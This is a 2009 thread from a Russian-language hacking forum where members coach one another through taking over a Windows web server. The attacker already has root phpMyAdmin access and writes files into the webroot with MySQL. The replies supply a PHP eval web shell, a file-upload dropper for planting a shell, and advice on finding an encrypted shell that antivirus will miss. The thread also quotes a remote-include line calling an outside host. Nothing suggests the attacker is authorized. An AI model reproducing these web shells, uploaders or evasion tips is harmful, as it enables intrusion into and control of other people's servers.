ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #8861  
Старый 07.09.2009, 19:42
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

При выводе из БД выдаёт такие символы:

Код:
lIlIllIIIlllIIllIIlIlllllllIIIIlIlI
причём только из колонок username И password
никто не сталкивался?
 

  #8862  
Старый 07.09.2009, 19:45
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

могут фильтроваться колоки, или быть обманками (пустая колонка, или забитая фигней) еще можно поиграться с лимитом!!! Но я точно не знаю
Если не трудно кинь скуль в лс я гляну)))

Последний раз редактировалось [x60]unu; 07.09.2009 в 20:02..
 

  #8863  
Старый 08.09.2009, 00:00
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

Есть рут доступ к phpmyadmin
для раскрытия пути использовал точку после пхп сесии.
выдало мне это
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1PHP Notice: Undefined variable: id in D:\name1\sname2\www\file.php on line 6
Далее захожу в phpmyadmin выполняю,
Код:
SELECT load_file( 'D:\name1\sname2\www\file.php' ) ;
ответ NULL,(и другие файлы пробовал такая же фигня)я понял уже что замута с путями,что не так вышло я не пойму
спасибо!
 

  #8864  
Старый 08.09.2009, 01:21
cr0w
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме:
2753780

Репутация: 585
По умолчанию

Shadrin

Используй в записи пути к файлу прямые слеши, а не обратные.
 

  #8865  
Старый 08.09.2009, 02:15
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

спасибо cr0w

в файл пишет и вижу такой код
Код:
<? @include("http://xxx.narod.ru/a.txt"); ?>
это я как понимаю у него прав на выполнение нету?попробовал несколько папок такая фигня везде
 

  #8866  
Старый 08.09.2009, 02:19
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

а в файл чонить попроще нельзя написать? И что значит "у него прав на выполнение нету"? Ты реально это просто почуствовал?

<?eval($_GET[e]);?> - в файл

http://сайт/путь к файлу/файл.php?e=phpinfo();

PS: А для начала хотя бы просто <?php phpinfo();?> в файло запиши.

НЕТ, нам сразу нужно удаленно чото инклудить. На 90% серваков allow_url_include отключен нафиг. Думайте головой уже, сначала хоть что-то простейшее на php загрузите, потом уже делайте выводы.

Последний раз редактировалось Pashkela; 08.09.2009 в 02:28..
 

  #8867  
Старый 08.09.2009, 02:52
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

Цитата:
Сообщение от Pashkela  
а в файл чонить попроще нельзя написать? И что значит "у него прав на выполнение нету"? Ты реально это просто почуствовал?

<?eval($_GET[e]);?> - в файл

http://сайт/путь к файлу/файл.php?e=phpinfo();

PS: А для начала хотя бы просто <?php phpinfo();?> в файло запиши.

НЕТ, нам сразу нужно удаленно чото инклудить. На 90% серваков allow_url_include отключен нафиг. Думайте головой уже, сначала хоть что-то простейшее на php загрузите, потом уже делайте выводы.
Записал <?php phpinfo();?> вижу инфо пхп
Записал <?eval($_GET[e]);?> ,при запросе файл.php?e=phpinfo(); вижу в пустую стариницу
и исходном коде <?eval($_GET[e]);?>


Последний раз редактировалось Shadrin; 08.09.2009 в 02:55..
 

  #8868  
Старый 08.09.2009, 02:58
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Записал <?php phpinfo();?> вижу инфо пхп
о, молодца, дальше почитай phpinfo, который выводится, там много интересного и познавательного можно увидеть.

Попробуй залить теперь вместо <?phpinfo();?> такую приблудку:

<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>

запусти и попробуй залить сразу рабочий шелл с компа прямо, или не шелл, картинку например, главное залить

PS: Шеллы лить - не рутина, но ребус

Учитывая, что винда - большая вероятность антивируса, скорее всего придется искать "нормально" криптованный шелл, а не с99 стандартный из паблика. Сам у себя запусти AV и попробуй обратиться к шеллу, который льешь, например просто открыть его в ноутпаде.

если попалась стандартная ситуация - повезло. Но везет не всегда.

Последний раз редактировалось Pashkela; 08.09.2009 в 03:04..
 

  #8869  
Старый 08.09.2009, 03:17
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

спасибо!хороший скрипт,тока он не хочет заливать шел,а выполняеться,а на своем хосте все норм
там сервер на винде может из за этого,у меня бывают с ними проблемы

Последний раз редактировалось Shadrin; 08.09.2009 в 03:29..
 

  #8870  
Старый 08.09.2009, 03:26
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Ищи нормальный криптованный шелл, вот что я тебе могу сказать напоследок. Если работает phpinfo - значит дело в шляпе.
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ